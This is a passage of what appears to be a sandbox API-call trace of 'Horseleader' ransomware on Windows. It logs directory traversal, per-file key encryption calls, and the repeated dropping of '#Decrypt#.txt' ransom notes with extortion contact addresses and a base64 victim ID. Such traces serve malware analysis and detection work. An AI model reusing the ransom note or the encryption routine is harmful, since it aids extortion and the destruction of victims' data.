(lpString="JWlzFd8ig4lNkIDqwk+OENg4xlYNIx+NYIIF2OITBbD5JB7PBCcH3DgT1yh4fLafWmPtVPJJ4wOSwYaLTam0t4RSiLOfjpC/u2+qPesk2aAejZmqIsYtucFLyI+7BoJGZuIs+z9UEuIYWzSdwDBewCphBxeDDT4RZKXmvwqf4jlsmMcXrEAhZNUu3GWL2bfT2aSDm7Nq4x24t44ckuClkeUi1Qzl0yyj4LLiRZeENVv89loGfBrMZaDRfyPQg7w6IvoUnqffqS6sB9AH7TSxebCaoSfiqXOdCWmMZ27T/s4SMrW2QbW4ZPfEKQpA3q3P8MFwfbpLyqo9cSAaxeQE84jYCoIM+xygruhfWrdJgxEOP5npcM30AAcVQNFpTKCiruCOXwCgc9ZqZJPow02eJYtG83PAxpXrbJ0w+7vGDZUYIcPyX8U+xDg1W0HEDDlYsCmRoIoJefUdFCIhWH4HyqGOnyx5UPzBzKgzM/72Q+a3rRwLTDj0v/rk6/dW8ghlTdAhxo0zl+DrJf9wFOIt0oAXQXL/rww96vUHb3jSE3i9GLhsVCDQ0RuW/fQsohzJ17oNguBmOwN0Hry/hzP2EgUgzLKERaymnsmN2W315Oz6XYg3+ZDJ8eP02rTITXKNRplxtQ/9dBgsF7EnQTuEDkHTEEbisTnKOL9aoou2ZDRK9BtknsYZhYquE/b2YEU0OWgNpGBYVvbG8BrVUl59OfojuYOtXVE41A6fIwMW0q9pd9ZLP6VJHEwQF6Vo5bzoDphmaO3dmDJMhY+6Xfm9EEb9aGu9i7TbvL6ZZOgO7i8T2szsq/ikGzrk3Jy68HWJRuwGKpD0irJUgHAs0fMqO2UBeA6onVYxtk1wVEJ1YLKDhuEZFda91rxQUDKVp1VfFvwuLLk0v86XsRDh5/++cwIBhMBVQiEtr7b9CfuF2H1z/VPELTk9Inx7LS725YE2gZwJqwDRLN3xeFColVc+AFRQ3zH/IcGVB1QD3lG32ko7AaR7ZhR5HgyMnGjVT0rBCUdj3uoYipP9UeOtxFa2ZfsOzaqCAqSnLCw9UZyUwj/qFxNvJ+ejulcfIYsVZHpkW5iyJKcyuIXs/KOuy/hpeUS7qDsDp1MoRkYrHisBbP5MXcQlCYgSq+IgkVqjapXZHXac8G9CvZdqMUyJahaJeW5PujhPfXK0kJB+aLqpVvF1uFiyCf1I2gVENNFf6hOjImA1x7BGRN6fA/qbuPUMcyGX9QECp6+o4xtyFp5jE5MGy6f9REEF/D7D/7V0JSoFaoylGz8JreWMeKNvJi1ek/ExUWrZOwxK8lYKKw6EeEPxXFlORrPY5TRR1GPxOvYz6hQ1aQYKSqXK5dEzwMWZjA==") returned 1368 [0234.246] WriteFile (in: hFile=0x158, lpBuffer=0x7d1740*, nNumberOfBytesToWrite=0x558, lpNumberOfBytesWritten=0x32aeb98, lpOverlapped=0x0 | out: lpBuffer=0x7d1740*, lpNumberOfBytesWritten=0x32aeb98*=0x558, lpOverlapped=0x0) returned 1 [0234.247] CloseHandle (hObject=0x158) returned 1 [0234.247] GetProcessHeap () returned 0x780000 [0234.247] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7db828 | out: hHeap=0x780000) returned 1 [0234.247] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd812c74, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd812c74, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd812c74, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="ro-RO", cAlternateFileName="")) returned 1 [0234.247] lstrcmpiW (lpString1="ro-RO", lpString2="Windows") returned -1 [0234.247] wnsprintfW (in: pszDest=0x7d9fd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ro-RO") returned 60 [0234.247] lstrcmpW (lpString1="ro-RO", lpString2=".") returned 1 [0234.247] lstrcmpW (lpString1="ro-RO", lpString2="..") returned 1 [0234.247] lstrcmpW (lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ro-RO", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned -1 [0234.247] GetProcessHeap () returned 0x780000 [0234.247] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7db828 [0234.247] wnsprintfW (in: pszDest=0x7db828, cchDest=1024, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ro-RO\\*") returned 62 [0234.247] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ro-RO\\*", lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd812c74, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd812c74, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd812c74, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x698c54f5, dwReserved1=0x2e7aebe8, cFileName=".", cAlternateFileName="")) returned 0x7c6760 [0234.248] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0234.248] wnsprintfW (in: pszDest=0x7db828, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ro-RO\\.") returned 62 [0234.248] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0234.248] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd812c74, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd812c74, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd812c74, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x698c54f5, dwReserved1=0x2e7aebe8, cFileName="..", cAlternateFileName="")) returned 1 [0234.248] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0234.248] wnsprintfW (in: pszDest=0x7db828, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ro-RO\\..") returned 63 [0234.248] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0234.248] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0234.248] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe215549d, ftCreationTime.dwHighDateTime=0x1ca0420, ftLastAccessTime.dwLowDateTime=0xe2390910, ftLastAccessTime.dwHighDateTime=0x1ca0420, ftLastWriteTime.dwLowDateTime=0xe2390910, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0xe00, dwReserved0=0x698c54f5, dwReserved1=0x2e7aebe8, cFileName="tipresx.dll.mui", cAlternateFileName="")) returned 1 [0234.248] lstrcmpiW (lpString1="tipresx.dll.mui", lpString2="Windows") returned -1 [0234.248] wnsprintfW (in: pszDest=0x7db828, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ro-RO\\tipresx.dll.mui") returned 76 [0234.248] StrStrIW (lpFirst="tipresx.dll.mui", lpSrch=".horseleader") returned 0x0 [0234.248] lstrcmpW (lpString1="tipresx.dll.mui", lpString2="#Decrypt#.txt") returned 1 [0234.248] lstrcmpW (lpString1="tipresx.dll.mui", lpString2="_uninstalling_.png") returned 1 [0234.248] lstrlenW (lpString=".testttjffg") returned 11 [0234.248] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ro-RO\\tipresx.dll.mui", lpSrch=".testttjffg") returned 0x0 [0234.248] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0234.248] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0234.248] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ro-RO\\tipresx.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ro-ro\\tipresx.dll.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0234.249] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe215549d, ftCreationTime.dwHighDateTime=0x1ca0420, ftLastAccessTime.dwLowDateTime=0xe2390910, ftLastAccessTime.dwHighDateTime=0x1ca0420, ftLastWriteTime.dwLowDateTime=0xe2390910, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0xe00, dwReserved0=0x698c54f5, dwReserved1=0x2e7aebe8, cFileName="tipresx.dll.mui", cAlternateFileName="")) returned 0 [0234.249] FindClose (in: hFindFile=0x7c6760 | out: hFindFile=0x7c6760) returned 1 [0234.249] wnsprintfW (in: pszDest=0x7db828, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ro-RO\\#Decrypt#.txt") returned 74 [0234.249] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ro-RO\\#Decrypt#.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ro-ro\\#decrypt#.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0234.249] lstrlenA (lpString="All your files have been ENCRYPTED!!!\r\nWrite to our ICQ @Horseleader\r\nOr contact us via jabber - horseleader@xmpp.jp\r\nJabber client installation instructions:\r\nDownload the jabber (Pidgin) client from https://pidgin.im/download/windows/ \r\n\r\nAfter installation, the Pidgin client will prompt you to create a new account. \r\nClick - Add\r\nIn the -Protocol field, select XMPP \r\nIn -Username - come up with any name \r\nIn the field -domain - enter any jabber-server, there are a lot of them, for example - exploit.im \r\nCreate a password\r\nAt the bottom, put a tick -Create account \r\nClick add \r\nIf you selected -domain - exploit.im, then a new window should appear in which you will need to re-enter your data: \r\nUser \r\npassword \r\nYou will need to follow the link to the captcha (there you will see the characters that you need to enter in the field below) \r\nIf you don't understand our Pidgin client installation instructions, you can find many installation tutorials on youtube - https://www.youtube.com/results?search_query=pidgin+jabber+install \r\nIf you have not received a response from us then we may have technical problems and please write to us using Jaber here bigbosshorse@xmpp.jp or on icq \r\nAttention!\r\nDo not rename encrypted files. \r\nDo not try to decrypt your data using third party software, it may cause permanent data loss. \r\nDecryption of your files with the help of third parties may cause increased price (they add their fee to our) or you can become a victim of a scam. \r\ntell your unique ID\r\n") returned 1508 [0234.249] WriteFile (in: hFile=0x158, lpBuffer=0xb41ca0*, nNumberOfBytesToWrite=0x5e4, lpNumberOfBytesWritten=0x32aeb98, lpOverlapped=0x0 | out: lpBuffer=0xb41ca0*, lpNumberOfBytesWritten=0x32aeb98*=0x5e4, lpOverlapped=0x0) returned 1 [0234.250] lstrlenA (lpString="JWlzFd8ig4lNkIDqwk+OENg4xlYNIx+NYIIF2OITBbD5JB7PBCcH3DgT1yh4fLafWmPtVPJJ4wOSwYaLTam0t4RSiLOfjpC/u2+qPesk2aAejZmqIsYtucFLyI+7BoJGZuIs+z9UEuIYWzSdwDBewCphBxeDDT4RZKXmvwqf4jlsmMcXrEAhZNUu3GWL2bfT2aSDm7Nq4x24t44ckuClkeUi1Qzl0yyj4LLiRZeENVv89loGfBrMZaDRfyPQg7w6IvoUnqffqS6sB9AH7TSxebCaoSfiqXOdCWmMZ27T/s4SMrW2QbW4ZPfEKQpA3q3P8MFwfbpLyqo9cSAaxeQE84jYCoIM+xygruhfWrdJgxEOP5npcM30AAcVQNFpTKCiruCOXwCgc9ZqZJPow02eJYtG83PAxpXrbJ0w+7vGDZUYIcPyX8U+xDg1W0HEDDlYsCmRoIoJefUdFCIhWH4HyqGOnyx5UPzBzKgzM/72Q+a3rRwLTDj0v/rk6/dW8ghlTdAhxo0zl+DrJf9wFOIt0oAXQXL/rww96vUHb3jSE3i9GLhsVCDQ0RuW/fQsohzJ17oNguBmOwN0Hry/hzP2EgUgzLKERaymnsmN2W315Oz6XYg3+ZDJ8eP02rTITXKNRplxtQ/9dBgsF7EnQTuEDkHTEEbisTnKOL9aoou2ZDRK9BtknsYZhYquE/b2YEU0OWgNpGBYVvbG8BrVUl59OfojuYOtXVE41A6fIwMW0q9pd9ZLP6VJHEwQF6Vo5bzoDphmaO3dmDJMhY+6Xfm9EEb9aGu9i7TbvL6ZZOgO7i8T2szsq/ikGzrk3Jy68HWJRuwGKpD0irJUgHAs0fMqO2UBeA6onVYxtk1wVEJ1YLKDhuEZFda91rxQUDKVp1VfFvwuLLk0v86XsRDh5/++cwIBhMBVQiEtr7b9CfuF2H1z/VPELTk9Inx7LS725YE2gZwJqwDRLN3xeFColVc+AFRQ3zH/IcGVB1QD3lG32ko7AaR7ZhR5HgyMnGjVT0rBCUdj3uoYipP9UeOtxFa2ZfsOzaqCAqSnLCw9UZyUwj/qFxNvJ+ejulcfIYsVZHpkW5iyJKcyuIXs/KOuy/hpeUS7qDsDp1MoRkYrHisBbP5MXcQlCYgSq+IgkVqjapXZHXac8G9CvZdqMUyJahaJeW5PujhPfXK0kJB+aLqpVvF1uFiyCf1I2gVENNFf6hOjImA1x7BGRN6fA/qbuPUMcyGX9QECp6+o4xtyFp5jE5MGy6f9REEF/D7D/7V0JSoFaoylGz8JreWMeKNvJi1ek/ExUWrZOwxK8lYKKw6EeEPxXFlORrPY5TRR1GPxOvYz6hQ1aQYKSqXK5dEzwMWZjA==") returned 1368 [0234.250] WriteFile (in: hFile=0x158, lpBuffer=0x7d1740*, nNumberOfBytesToWrite=0x558, lpNumberOfBytesWritten=0x32aeb98, lpOverlapped=0x0 | out: lpBuffer=0x7d1740*, lpNumberOfBytesWritten=0x32aeb98*=0x558, lpOverlapped=0x0) returned 1 [0234.251] CloseHandle (hObject=0x158) returned 1 [0234.251] GetProcessHeap () returned 0x780000 [0234.251] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7db828 | out: hHeap=0x780000) returned 1 [0234.251] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x42a795bf, ftCreationTime.dwHighDateTime=0x1ca0416, ftLastAccessTime.dwLowDateTime=0x42a795bf, ftLastAccessTime.dwHighDateTime=0x1ca0416, ftLastWriteTime.dwLowDateTime=0x43f1e320, ftLastWriteTime.dwHighDateTime=0x1ca0424, nFileSizeHigh=0x0, nFileSizeLow=0x29800, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="rtscom.dll", cAlternateFileName="")) returned 1 [0234.251] lstrcmpiW (lpString1="rtscom.dll", lpString2="Windows") returned -1 [0234.251] wnsprintfW (in: pszDest=0x7d9fd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\rtscom.dll") returned 65 [0234.251] StrStrIW (lpFirst="rtscom.dll", lpSrch=".horseleader") returned 0x0 [0234.251] lstrcmpW (lpString1="rtscom.dll", lpString2="#Decrypt#.txt") returned 1 [0234.251] lstrcmpW (lpString1="rtscom.dll", lpString2="_uninstalling_.png") returned 1 [0234.251] lstrlenW (lpString=".testttjffg") returned 11 [0234.251] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\rtscom.dll", lpSrch=".testttjffg") returned 0x0 [0234.251] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0234.251] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0234.252] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\rtscom.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\rtscom.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0234.252] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd812c74, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd838dce, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd838dce, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="ru-RU", cAlternateFileName="")) returned 1 [0234.252] lstrcmpiW (lpString1="ru-RU", lpString2="Windows") returned -1 [0234.252] wnsprintfW (in: pszDest=0x7d9fd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ru-RU") returned 60 [0234.252] lstrcmpW (lpString1="ru-RU", lpString2=".") returned 1 [0234.252] lstrcmpW (lpString1="ru-RU", lpString2="..") returned 1 [0234.252] lstrcmpW (lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ru-RU", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned -1 [0234.252] GetProcessHeap () returned 0x780000 [0234.252] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7db828 [0234.252] wnsprintfW (in: pszDest=0x7db828, cchDest=1024, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ru-RU\\*") returned 62 [0234.252] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ru-RU\\*", lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd812c74, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd838dce, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd838dce, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x698c54f5, dwReserved1=0x2e7aebe8, cFileName=".", cAlternateFileName="")) returned 0x7c6760 [0234.253] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0234.253] wnsprintfW (in: pszDest=0x7db828, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ru-RU\\.") returned 62 [0234.253] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0234.253] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd812c74, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd838dce, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd838dce, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x698c54f5, dwReserved1=0x2e7aebe8, cFileName="..", cAlternateFileName="")) returned 1 [0234.253] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0234.253] wnsprintfW (in: pszDest=0x7db828, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ru-RU\\..") returned 63 [0234.254] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0234.254] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0234.254] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xea6a1a1d, ftCreationTime.dwHighDateTime=0x1ca0420, ftLastAccessTime.dwLowDateTime=0xea8dce90, ftLastAccessTime.dwHighDateTime=0x1ca0420, ftLastWriteTime.dwLowDateTime=0xea902fed, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0xe00, dwReserved0=0x698c54f5, dwReserved1=0x2e7aebe8, cFileName="tipresx.dll.mui", cAlternateFileName="")) returned 1 [0234.254] lstrcmpiW (lpString1="tipresx.dll.mui", lpString2="Windows") returned -1 [0234.254] wnsprintfW (in: pszDest=0x7db828, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ru-RU\\tipresx.dll.mui") returned 76 [0234.254] StrStrIW (lpFirst="tipresx.dll.mui", lpSrch=".horseleader") returned 0x0 [0234.254] lstrcmpW (lpString1="tipresx.dll.mui", lpString2="#Decrypt#.txt") returned 1 [0234.254] lstrcmpW (lpString1="tipresx.dll.mui", lpString2="_uninstalling_.png") returned 1 [0234.254] lstrlenW (lpString=".testttjffg") returned 11 [0234.254] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ru-RU\\tipresx.dll.mui", lpSrch=".testttjffg") returned 0x0 [0234.254] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0234.254] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0234.254] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ru-RU\\tipresx.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ru-ru\\tipresx.dll.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0234.255] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xea6a1a1d, ftCreationTime.dwHighDateTime=0x1ca0420, ftLastAccessTime.dwLowDateTime=0xea8dce90, ftLastAccessTime.dwHighDateTime=0x1ca0420, ftLastWriteTime.dwLowDateTime=0xea902fed, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0xe00, dwReserved0=0x698c54f5, dwReserved1=0x2e7aebe8, cFileName="tipresx.dll.mui", cAlternateFileName="")) returned 0 [0234.255] FindClose (in: hFindFile=0x7c6760 | out: hFindFile=0x7c6760) returned 1 [0234.255] wnsprintfW (in: pszDest=0x7db828, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ru-RU\\#Decrypt#.txt") returned 74 [0234.255] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ru-RU\\#Decrypt#.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ru-ru\\#decrypt#.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0234.257] lstrlenA (lpString="All your files have been ENCRYPTED!!!\r\nWrite to our ICQ @Horseleader\r\nOr contact us via jabber - horseleader@xmpp.jp\r\nJabber client installation instructions:\r\nDownload the jabber (Pidgin) client from https://pidgin.im/download/windows/ \r\n\r\nAfter installation, the Pidgin client will prompt you to create a new account. \r\nClick - Add\r\nIn the -Protocol field, select XMPP \r\nIn -Username - come up with any name \r\nIn the field -domain - enter any jabber-server, there are a lot of them, for example - exploit.im \r\nCreate a password\r\nAt the bottom, put a tick -Create account \r\nClick add \r\nIf you selected -domain - exploit.im, then a new window should appear in which you will need to re-enter your data: \r\nUser \r\npassword \r\nYou will need to follow the link to the captcha (there you will see the characters that you need to enter in the field below) \r\nIf you don't understand our Pidgin client installation instructions, you can find many installation tutorials on youtube - https://www.youtube.com/results?search_query=pidgin+jabber+install \r\nIf you have not received a response from us then we may have technical problems and please write to us using Jaber here bigbosshorse@xmpp.jp or on icq \r\nAttention!\r\nDo not rename encrypted files. \r\nDo not try to decrypt your data using third party software, it may cause permanent data loss. \r\nDecryption of your files with the help of third parties may cause increased price (they add their fee to our) or you can become a victim of a scam. \r\ntell your unique ID\r\n") returned 1508 [0234.257] WriteFile (in: hFile=0x158, lpBuffer=0xb41ca0*, nNumberOfBytesToWrite=0x5e4, lpNumberOfBytesWritten=0x32aeb98, lpOverlapped=0x0 | out: lpBuffer=0xb41ca0*, lpNumberOfBytesWritten=0x32aeb98*=0x5e4, lpOverlapped=0x0) returned 1 [0234.258] lstrlenA (lpString="JWlzFd8ig4lNkIDqwk+OENg4xlYNIx+NYIIF2OITBbD5JB7PBCcH3DgT1yh4fLafWmPtVPJJ4wOSwYaLTam0t4RSiLOfjpC/u2+qPesk2aAejZmqIsYtucFLyI+7BoJGZuIs+z9UEuIYWzSdwDBewCphBxeDDT4RZKXmvwqf4jlsmMcXrEAhZNUu3GWL2bfT2aSDm7Nq4x24t44ckuClkeUi1Qzl0yyj4LLiRZeENVv89loGfBrMZaDRfyPQg7w6IvoUnqffqS6sB9AH7TSxebCaoSfiqXOdCWmMZ27T/s4SMrW2QbW4ZPfEKQpA3q3P8MFwfbpLyqo9cSAaxeQE84jYCoIM+xygruhfWrdJgxEOP5npcM30AAcVQNFpTKCiruCOXwCgc9ZqZJPow02eJYtG83PAxpXrbJ0w+7vGDZUYIcPyX8U+xDg1W0HEDDlYsCmRoIoJefUdFCIhWH4HyqGOnyx5UPzBzKgzM/72Q+a3rRwLTDj0v/rk6/dW8ghlTdAhxo0zl+DrJf9wFOIt0oAXQXL/rww96vUHb3jSE3i9GLhsVCDQ0RuW/fQsohzJ17oNguBmOwN0Hry/hzP2EgUgzLKERaymnsmN2W315Oz6XYg3+ZDJ8eP02rTITXKNRplxtQ/9dBgsF7EnQTuEDkHTEEbisTnKOL9aoou2ZDRK9BtknsYZhYquE/b2YEU0OWgNpGBYVvbG8BrVUl59OfojuYOtXVE41A6fIwMW0q9pd9ZLP6VJHEwQF6Vo5bzoDphmaO3dmDJMhY+6Xfm9EEb9aGu9i7TbvL6ZZOgO7i8T2szsq/ikGzrk3Jy68HWJRuwGKpD0irJUgHAs0fMqO2UBeA6onVYxtk1wVEJ1YLKDhuEZFda91rxQUDKVp1VfFvwuLLk0v86XsRDh5/++cwIBhMBVQiEtr7b9CfuF2H1z/VPELTk9Inx7LS725YE2gZwJqwDRLN3xeFColVc+AFRQ3zH/IcGVB1QD3lG32ko7AaR7ZhR5HgyMnGjVT0rBCUdj3uoYipP9UeOtxFa2ZfsOzaqCAqSnLCw9UZyUwj/qFxNvJ+ejulcfIYsVZHpkW5iyJKcyuIXs/KOuy/hpeUS7qDsDp1MoRkYrHisBbP5MXcQlCYgSq+IgkVqjapXZHXac8G9CvZdqMUyJahaJeW5PujhPfXK0kJB+aLqpVvF1uFiyCf1I2gVENNFf6hOjImA1x7BGRN6fA/qbuPUMcyGX9QECp6+o4xtyFp5jE5MGy6f9REEF/D7D/7V0JSoFaoylGz8JreWMeKNvJi1ek/ExUWrZOwxK8lYKKw6EeEPxXFlORrPY5TRR1GPxOvYz6hQ1aQYKSqXK5dEzwMWZjA==") returned 1368 [0234.258] WriteFile (in: hFile=0x158, lpBuffer=0x7d1740*, nNumberOfBytesToWrite=0x558, lpNumberOfBytesWritten=0x32aeb98, lpOverlapped=0x0 | out: lpBuffer=0x7d1740*, lpNumberOfBytesWritten=0x32aeb98*=0x558, lpOverlapped=0x0) returned 1 [0234.258] CloseHandle (hObject=0x158) returned 1 [0234.258] GetProcessHeap () returned 0x780000 [0234.258] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7db828 | 